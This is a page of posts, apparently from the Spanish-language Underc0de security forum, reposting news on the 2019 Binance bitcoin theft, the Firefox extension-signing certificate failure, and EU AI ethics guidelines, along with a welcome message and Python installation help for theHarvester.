Sin embargo, sería mejor si toma algunas medidas adicionales al usar las claves de seguridad, como usarlas solo en un lugar privado y desemparejarlas inmediatamente.

FUENTE

36


Binance informa que sufrió una brecha de seguridad en su sistema debido a una gran variedad de ataques informáticos que sufrió el día de hoy. Reporta que los hackers lograron retirar de la casa de cambio 7.000 BTC en su ataque, estos fondo se encontraban en el monedero caliente (conectado a la red) de Binance.

En su reporte, Binance detalla que los hackers accedieron a un gran número de claves API, códigos de dos factores de seguridad (2FA) y posiblemente otros datos. Los atacantes utilizaron múltiples métodos de ataque incluyendo phishing, virus y otros que faltan por confirmar. Menciona que pueden estar afectadas varias cuentas, que no han terminado de identificar.

Los hackers consiguieron retirar de Binance los 7.000 BTC en una sola transacción, que activó todas las alarmas de su sistema de seguridad. Procedieron luego a detener todos los retiros. Estos bitcoin están cotizados en alrededor de los 40 millones de dolares, para el momento de redacción. La criptobolsa destacada que solo fueron afectados el 2% de todos sus fondos de BTC, que se encontraban en su monedero conectado a la red.

En vista de lo sucedido, el equipo de Binance afirma que van a realizar una auditoría de seguridad a todo su sistema y sus datos, que podría durar al menos una semana. Durante ese tiempo, todos los depósitos y retiros van a estar suspendidos. El intercambio entre criptomonedas va a seguir activo, sin embargo mencionan que el atacante podría manipular los precios de algunos pares de cambio, por tener el control de varias cuentas. Binance asegura que va a responder a sus clientes por los BTC robados, con su fondo de respaldo.

A las 3:06 pm, hora de Venezuela, el CEO de Binance reportó por Twitter que iban a realizar un servicio de mantenimiento no programado. Informó sobre la suspensión de los depósitos y retiros, que aseguró que iba a durar unas pocas horas. Es probable que para ese momento ya tuviesen conocimiento del ataque a su sistema.

    Have to perform some unscheduled server maintenance that will impact deposits and withdrawals for a couple hours. No need to FUD. Funds are #safu.

    — CZ Binance (@cz_binance) May 7, 2019

Este viene a ser el primer hackeo más grande y notorio de un casa de cambio en lo que va de 2019. Se han reportado distintos ataques a usuarios de criptomonedas, pero no un ataque directo a una casa de cambio como Binance.

FUENTE

37
Presentaciones / Re:Buenos días.
« en: Mayo 08, 2019, 08:04:07 am »
Hola @DiezX bienvenido a Underc0de!

Espero que te sientas cómodo en la comunidad, hay mucho material para aprender y también nos puedes compartir tus conocimientos.

Saludos!
K A I L

38


A medida que ha ido pasando el tiempo, hemos podido comprobar cómo las extensiones que de manera habitual instalamos en nuestros navegadores, han ido ganando importancia, llegando a convertirse en elementos clave en algunos casos para el correcto funcionamiento del software.

Pues bien, cabe la posibilidad de que de unas horas a esta parte algunos encontremos con el problema de que, repentinamente, todas las extensiones de Firefox, están deshabilitadas sin razón alguna aparente, o al menos la mayoría. Llegado el caso, lo más probable es que estas muestren mensajes que nos indican que no se puede verificar su uso en Firefox y por tanto han sido desactivadas, todo ello en el gestor de complementos del navegador, lo que puede resultar un tanto preocupante.

Hay muchas extensiones afectadas por este nuevo fallo que acaba de ser descubierto, algunas tan conocidas y usadas como LastPass, Ghostery, Download Manager, Dark Mode, NoScript, etc. Es por ello que si te encontrás ante este inconveniente, la opción que el navegador nos propone para que todo vuelva a la normalidad, es eliminar estos pequeños programas añadidos y buscar un sustituto, lo que representa un serio inconveniente en algunos casos.



De hecho muchos podrían llegar a pensar que esto se debe al cambio en las políticas de extensiones que Mozilla ha anunciado que va a aplicar en un futuro, pero no, no tiene nada que ver con todo esto, al menos por el momento.

Diremos que todo esto se debe a un error relacionado con la firma de las propias extensiones, ya que todas estas extensiones afectadas están deshabilitadas repentinamente debido a la expiración del certificado de firma. De hecho todas ellas deben estar firmadas desde Firefox 48 y Firefox ESR 52, por lo que el navegador bloqueará la instalación de extensiones con certificados no válidos, o sin certificado, y eso es lo que ahora está causando los problemas a los que os hemos hecho mención.

Al mismo tiempo en estos momentos también se está reportando que algunos usuarios no pueden instalar extensiones desde el repositorio oficial de complementos de Mozilla. Por tanto, aquellos que tengan instalada una versión Nightly o Dev de Firefox, pueden deshabilitar la firma de extensiones, algunos afirman que esto resolvió el problema temporalmente. Para ello es necesario acceder a la preferencia “xpinstall.signatures.required” y establecerla como “false” en “about:config”.

Esto lo que hace es desactivar la firma, aunque también podemos cambiar la fecha del sistema al día anterior para resolverlo temporalmente también, pero eso puede llevarnos a otros problemas. Por tanto, en estos momentos este es un fallo que sólo puede ser resuelto por Mozilla, ya que la empresa necesita renovar el certificado o crear uno nuevo para resolver el problema.

Es por esto que no recomendamos eliminar las extensiones afectadas y esperar a que Mozilla lo resuelva cuanto antes, lo que solucionaría todo esto de manera automática.

FUENTE

39
Hola @elman

Por lo que veo es posible que tu error sea porque estás usando la herramienta theHarvester con la versión de Python equivocada, según tu screenshot se puede deducir que estás usando la version 2.7, pero para saberlo ejecutá el siguiente comando:

Código: [Seleccionar]
python -V
En GitHub señalan que requiere de Python 3.6, y que ejecutes el siguiente comando:

Código: [Seleccionar]
python3 -m pip install -r requirements.txt
Aqui van capturas:



En mi caso tengo la version 3.7 y funciona igual.



El siguiente post te puede ayudar:
Python 2 y 3 en la misma PC

Saludos!
K A I L

40


La Comisión Europea (CE) presentó este lunes sus líneas maestras para desarrollar la inteligencia artificial (IA) en la Unión Europea (UE) garantizando el objetivo de conseguir beneficios para toda la sociedad, respetando la privacidad de los datos y protegiéndose frente a previsibles errores y ataques.

«La dimensión ética de la inteligencia artificial no es una característica de lujo o un añadido: tiene que ser parte integral de su desarrollo», señalan en sus conclusiones la «comunicación» sobre la materia presentada por la CE, que consiste en un documento orientativo con vinculaciones legales y elaborado a partir del trabajo de un grupo interdisciplinar de expertos en la materia.

El primer desafío ético de esa nueva tecnología, apunta el documento, pasa por ganar confianza entre los ciudadanos y para ello el sector y los agentes políticos llamados a regularlo deben fijarse como meta «incrementar el bienestar», observando valores de la Unión Europea como «el respeto a la dignidad humana, la democracia, la igualdad, el Estado de derecho y los derechos humanos».

A partir de ahí, los expertos consultados por el Ejecutivo comunitario han identificado una serie de requerimientos clave para el desarrollo de la IA, en función del contexto: no es lo mismo una herramienta que falle al recomendar un libro a un lector que una aplicación que diagnostica erróneamente un cáncer, subraya la CE.

Áreas claves

  • Supervisión humana: Debe de ser supervisada por seres humanos, con las «apropiadas medidas de contingencia».
  • Robustez y seguridad: Los sistemas deben de ser «resistentes» y «resilientes» ante eventuales intentos de manipulaciones o de pirateo y dotarse de planes de contingencia.
  • Privacidad y control de los datos: Se debe de garantizar la privacidad de los datos de los ciudadanos en todo el ciclo vital de la inteligencia artificial.
  • Transparencia: La IA debe de ser transparente, lo que supone poder reconstruir cómo y por qué se comporta de una determinada manera y quienes interactúen con esos sistemas deben de saber que se trata de inteligencia artificial así como qué personas son sus responsables.
  • Diversidad, no discriminación y equidad: La inteligencia artificial debe de tener en cuenta la diversidad social desde su desarrollo para garantizar que los algoritmos en que se base no tengan sesgos discriminatorios directos o indirectos.
  • Bienestar social y ambiental: El desarrollo tecnológico debe de tener en cuenta su impacto social y medioambiental de forma que sea sostenible y ecológicamente responsable.
  • Responsabilidad: La inteligencia artificial y sus resultados deben de rendir cuentas ante auditores externos e internos.

La CE presentará ahora estas guías éticas a los Estados miembros de la UE y a los distintos actores del sector y, a partir de junio, diseñará una fase piloto para obtener retroalimentación de quienes están implicados en el salto tecnológico que suponen las máquinas capaces de aprender y decidir por sí mismas.

A partir de esa información, a inicios de 2020 se actualizarán las guías sobre ética robótica y la Inteligencia Artificial según vaya avanzando su potencial.

FUENTE

COMUNICADO

Páginas: 1 [2] 3 4 ... 10